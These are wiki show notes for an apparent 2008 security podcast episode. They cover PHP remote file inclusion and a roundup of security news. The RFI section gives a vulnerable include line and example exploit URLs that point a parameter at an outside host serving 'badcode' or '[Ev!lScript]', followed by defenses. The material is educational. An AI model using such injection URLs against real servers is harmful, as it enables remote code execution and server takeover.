Episode54

From Paul's Security Weekly
Revision as of 16:54, 14 March 2008 by Steven.mcgrath (Talk | contribs)

Jump to: navigation, search

Exploit Of The Week: PHP Remote File Includes

We all know about some of the more traditional vulnerabilities, such as stack-based buffer overflows, integer overflows, format string attacks, cross-site scripting, and more. However, remote file inclusion vulnerabilities are slightly different, and becoming very popular. The article Remote file inclusion vulnerabilities by Jake Edge does a good job of explaining:

"An attacker's fondest wish is to be able to run their code on the target system; an RFI exploit does just that. By exploiting two very dubious 'features' of the PHP language, an attacker can inject their code into a PHP program on the server. Once they can do that, they can access anything that the PHP program could: databases, password files, etc. They can install their own shell running with the privileges of the web server user (such as 'apache' or 'httpd') and if the server has not been patched for some local user privilege escalation vulnerability, the shell could be used to become the root user."

Example Vulnerability:

include($base_path . "/foo.php");

Example Exploit:

http://vulnerable.com/RFI.php?base_path= http://example.com/badcode?foo=

MilW0rm Example:

Link: http://www.milw0rm.com/exploits/2894

Software: Phorum v3.2.11

Vendor: http://www.phorum.org/

Example Vulnerability:

$db_file = './db/postgresql65.php';

Example Exploit:

http://[localhost]/[paTh]/common.php?db_file=[Ev!lScript]

Defenses:

- Set register_globals to OFF (http://us2.php.net/register_globals)

- Enable safe_mode (http://www.php.net/features.safe-mode)

- Configure disable_functions to disallow the ?system? and ?exec? functions (this would have prevented the attackers from running arbitrary commands).

Further Reading:

http://www.securityfocus.com/infocus/1864

http://www.sans.org/top20/#c1

Tech Talk with Larry: Windows Authentication with RFID

RFIDToys - To download the software for the book projects, you need to register for the forums.

Extremetech article - on windows authentication with RFID.

RFID Firewall - something that I'll be looking at later.

Stories For Discussion

YAIEV For IE 6 and 7 - [PaulDotCom] - This one is labeled as content retrieval, Secunia says: "This actually means that if you were logged into your bank account, any web site you are visiting would be able to retrieve confidential data from your bank. This could also be used to retrieve personal settings entered on sites like eBay or Paypal." Of course there is no patch for this vulnerability....

Snort Inline (and other features) Article - [PaulDotCom] - Snort continues to evolve and become one of the most important tools in your defense arsenal. This article shows you how to use it for an IPS, anti-virus gateway, and performance monitor! Cool stuff.

Bizarre and Funny Wireless Posting - [PaulDotCom] - Wifi interfering with electricity? "I think there is hacker living on my street anyway...." Oh no! A hacker! There goes the neighborhood...

Security People Use Firefox - [PaulDotCom] - So should you :)

Windows Cmd Line Foo From Ed Skoudis - [PaulDotCom] - Some really cool tips on using netstat in windows in new and interesting ways. [Larry] - Ed's command line fu is totally amazing.

Zero Day Vulnerability Tracker - [PaulDotCom] - Don't get me wrong, I think this is a valuable services, however, is Microsoft the only vendor out there with 0days? [Larry] - I'm sure we'll see this populated with all sorts of nasties - Like Oracle O-days!

MySpace + Quicktime + Apple = Disasster- [PaulDotCom] - What a mess, who is Tom? Is that like a peeing Tom? Wouldn't surprise me on MySpace, however, this it the toaly wrong way to distribute patches. I agree with Krebbs, MySpace should disable quicktime until they get a fix. Of course that breaks like *everyones* MySpace page.... [Larry] - EVERY person (except for me) in my CIS 102 class was on Myspace last night. I was jist waiting for Quicktime.

Incident Handling On Your Cell Phone - [PaulDotCom] - Funny posting from Tom Liston, and an example of really bad Malware coding.

Open Letter to Domain Registrars - [PaulDotCom] - When are we going to have common sense applied to domain registration? Should ebay be buying these domains? Should people be prevented from registering them? [Larry] - this is a really sticky situation that the registrats could be in for many reasons.

Shmoocon! - [Larry] - The PDC crew have their tickets, do you?

IBM Tivoli remote overflow/DOS - [Larry] We stress good backups all the time, and well, Tivoli server handles all of your backups. Honestly, If I wanted to cause damage to someone's computing abilities, damage the backups, and THEN go after the rest.

Belkin Wireless USB hub - [Larry] - We got asked about this not too long ago, but looks like we can soon have wireless USB from 30 feet. Yet another wireless technology to be aware of, audit, protect, etc. Some analysis of these devices might make for a kick-butt GAWN paper.

Chinese Hackers take out Naval War College - [Larry] - Right on our oen back yard. Isnt this where Stephen Northcut used to work, or was that Richard Beijtlich? Either way, the are still offline almost a week later, and no idea when they are coming back.

New version of Cain and Abel - [Larry] - a great tool, especially for capturing VIOP traffic. I wonder if it is a possible via wireless with Airpcap?

One secure USB drive - [Larry] - Encryption, biometrics, and a combination lock. What's next? "This item will self destruct..."

FreeRADIUS Vulnerabilities - [Larry] - On the top of my mind, as we were looking at some RADUIS solutions for a project...

Month Of Novell Bugs? - [PaulDotCom] - There have been a long string of vulnerabilities found in Novell products in the past month or so, here's a breakdown:

Novell Client Remote Exploit Zen Works SQL Injection Novell Client DoS Novell Zen Works Heap Overflow Novell iManager DoS Novell eDirectory DoS

Intel LAN driver privilege escalation - [Larry] - from wirless to wired. Sure, not as "dangerous" but jsut you wait. I bet this is just the next step in driver fuzzing.

Adobe Vulnerability Watch - [PaulDotCom] - I always try to keep a close watch on the vulnerabilities in Adobe reader and the like as most users install this app by default when they build a system, therefor making it a big target for attackers. [Adobe Reader Vulnerability Uncovered recently http://www.kb.cert.org/vuls/id/198908].

Mobile Malware - [Larry] - Uh oh, it is on!

Other Stories Of Interest

Start Global Thermonuclear War On You PC! - [PaulDotCom] - Very cool game and screenshots, and for only $17!